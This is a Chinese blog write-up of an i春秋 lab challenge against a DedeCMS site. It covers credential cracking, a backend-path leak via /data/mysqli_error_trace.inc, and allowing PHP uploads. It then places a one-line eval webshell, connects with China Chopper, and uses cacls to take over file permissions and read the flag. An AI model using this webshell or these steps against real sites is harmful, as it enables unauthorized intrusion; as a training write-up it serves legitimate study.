zoukankan      html  css  js  c++  java
  • 真的很简单

    首先打开界面

    发现没有提示给我们的dedeCMS工具,所以这里我们自己下载

    http://file.ichunqiu.com/49ba59ab

    再打开dedeCMS,粘贴上他给我们的网站

    点一键爆。。。。就可以得到推荐那里显示的账号与密码,不过密码是md5加密

    解密后是only_system,则only_system就是我们要找的密码,用户名就ichunqiu

    再做第二题,试了试御剑,好像扫不出来,只能用搜到的方法:使用

    /data/mysqli_error_trace.inc来利用后台地址信息泄露的漏洞

    得到返回页,则lichunqiul为后台目录名

    再第三题

    我们直接http://www.test.ichunqiu/lichunqiul/进去

    用户名与密码就第一题破解出来的

    输入之后登录

    再在系统—系统基本参数—附件设置中添加php类型的文件

    这样我们就可以上传我们的一句话木马了(更改后别忘了下面点确定)

    在桌面上新建一个txt然后重命名为test.php然后内容输入为我们的一句话木马

     <?php @eval($_POST['cmd']); ?>

    写好后在网页后台中选择核心—上传新文件就可以上传我们的一句话木马了

    (选择类型为其他说明标题为test.php点浏览选择桌面上的test.php)

    保存后再选择更改我们的木马就可以看见我们的木马路径了

    点击查看,然后复制url路径,再使用菜刀(在桌面toolswebshell里面)

    右键菜刀白板然后点新建(添加),补足信息

    点添加,再双击连接就可以进入了

    再依次点击c盘——文档与设置——管理者——桌面,就可以看到一个flagtxt文本

    不过这里我们暂时看不了里面的内容,可能权限不够

    我们直接在木马连接处右键然后点击虚拟终端进入后台cmd

    输入cd C:Documents and SettingsAdministrator桌面进入桌面文件夹

    再输入 type flag~ichunqiu.txt查看试试

    返回拒绝访问,果然我们的权限不够

    使用cacls命令看看权限:cacls flag~ichunqiu.txt

    果然我们的NT AUTHORITYSYSTEM栏为N,意思是none

    这里我们直接更改他的设置就行了

    输入cacls flag~ichunqiu.txt /E /P system:F /C就可以更改他的设置了

    再次输入cacls flag~ichunqiu.txt查看权限

    果然我们的NT AUTHORITYSYSTEM栏就改为F

    我们再次输入type  flag~ichunqiu.txt进行查看

    就可以看到flag

    key{il2o3l}

    这里的flagil2o3l,需要把key{}去掉

    就可以得到100分了

    这里再补充一下cacls的用法

    R 读取
    W 写入
    C 更改(写入)
    F 完全控制
    cacls用法可通过cmd直接查看,具体如下:
    显示或者修改文件的访问控制列表(ACL)
    
     CACLS filename [/T] [/M] [/L] [/S[:SDDL]] [/E] [/C] [/G user:perm]
            [/R user [...]] [/P user:perm [...]] [/D user [...]]
        filename      显示 ACL。
        /T            更改当前目录及其所有子目录中
                      指定文件的 ACL。
        /L            对照目标处理符号链接本身
        /M            更改装载到目录的卷的 ACL
        /S            显示 DACL 的 SDDL 字符串。
        /S:SDDL       使用在 SDDL 字符串中指定的 ACL 替换 ACL。
                      (/E、/G、/R、/P 或 /D 无效)。
        /E            编辑 ACL 而不替换。
        /C            在出现拒绝访问错误时继续。
        /G user:perm  赋予指定用户访问权限。
                      Perm 可以是: R  读取
                                   W  写入
                                   C  更改(写入)
                                   F  完全控制
        /R user       撤销指定用户的访问权限(仅在与 /E 一起使用时合法)。
        /P user:perm  替换指定用户的访问权限。
                      Perm 可以是: N  无
                                   R  读取
                                   W  写入
                                   C  更改(写入)
                                   F  完全控制
        /D user       拒绝指定用户的访问。
     在命令中可以使用通配符指定多个文件。
     也可以在命令中指定多个用户。
    
    缩写:
        CI - 容器继承。
             ACE 会由目录继承。
        OI - 对象继承。
             ACE 会由文件继承。
        IO - 只继承。
             ACE 不适用于当前文件/目录。
        ID - 已继承。
             ACE 从父目录的 ACL 继承。
    

      

  • 相关阅读:
    jqgrid 使用入门
    bootstrap build
    bootstrap ace
    前序中序后序
    蓝桥杯-【交换瓶子】
    蓝桥杯-【剪邮票】【2016年省赛B组题解】--bfs+全排列
    蓝桥杯-【方格填数】【2016年省赛B组题解】
    2018年第九届蓝桥杯【C++省赛B组】【第十题:乘积最大】—贪心算法
    2018年第九届蓝桥杯【C++省赛B组】 第九题——全球变暖(bfs+queue)
    2018年第九届蓝桥杯【C++省赛B组】【第八题:日志统计】尺取法
  • 原文地址:https://www.cnblogs.com/wosun/p/11219888.html
Copyright © 2011-2022 走看看